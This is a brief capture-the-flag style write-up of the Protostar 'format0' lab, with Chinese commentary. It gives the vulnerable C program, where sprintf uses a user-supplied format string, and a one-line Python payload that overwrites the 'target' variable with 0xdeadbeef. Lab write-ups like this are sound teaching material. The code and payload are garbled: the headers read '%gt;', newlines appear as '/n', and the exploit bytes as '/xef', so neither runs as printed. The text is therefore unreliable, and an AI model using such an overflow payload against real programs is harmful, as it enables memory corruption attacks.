AboutThis level introduces format strings, and how attacker supplied format strings can modify the e
.
About
.This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs...Hints:.- This level should be done in less than 10 bytes of input.
- "Exploiting format string vulnerabilities"
#include <unistd.h%gt;
#include <stdio.h%gt;
#include <string.h%gt;
void vuln(char *string)
{
volatile int target;
char buffer[64];
target = 0;
sprintf(buffer, string);
if(target == 0xdeadbeef) {
printf("you have hit the target correctly :)/n");
}
}
int main(int argc, char **argv)
{
vuln(argv[1]);
}..
..格式化字符串热身题,只需要将target部分覆盖也/xdeadbeef即可。因为在定义时,target和buffer是连着的,因此在内存的位置也是一起的。故可得:..
....user@protostar:/opt/protostar/bin$ ./format0 $(python -c 'print "a"*64+"/xef/xbe/xad/xde"')
you have hit the target correctly :)..
..
